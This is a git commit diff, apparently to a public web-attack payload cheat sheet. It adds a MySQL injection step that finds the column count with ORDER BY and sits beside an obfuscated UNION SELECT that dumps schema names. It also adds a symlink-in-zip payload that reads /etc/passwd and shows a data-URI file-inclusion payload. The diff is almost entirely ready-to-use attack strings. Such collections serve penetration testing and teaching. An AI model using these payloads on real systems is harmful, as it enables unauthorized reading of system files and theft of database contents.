Symbolic Link Zip + SQL injection ORDER BY

patch-1
Swissky 2017-07-04 23:17:59 +02:00
parent a1fbd41bbb
commit 6070ece522
4 changed files with 16 additions and 3 deletions

View File

@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
``` ```
## Thanks to ## Thanks to
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)

View File

@ -1,5 +1,15 @@
# MYSQL Injection # MYSQL Injection
##Detect columns number
Using a simple ORDER
```
order by 1
order by 2
order by 3
...
order by XXX
```
##MySQL Union Based ##MySQL Union Based
``` ```
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata

Binary file not shown.

View File

@ -0,0 +1,2 @@
ln -s /etc/passwd link
zip --symlinks test.zip link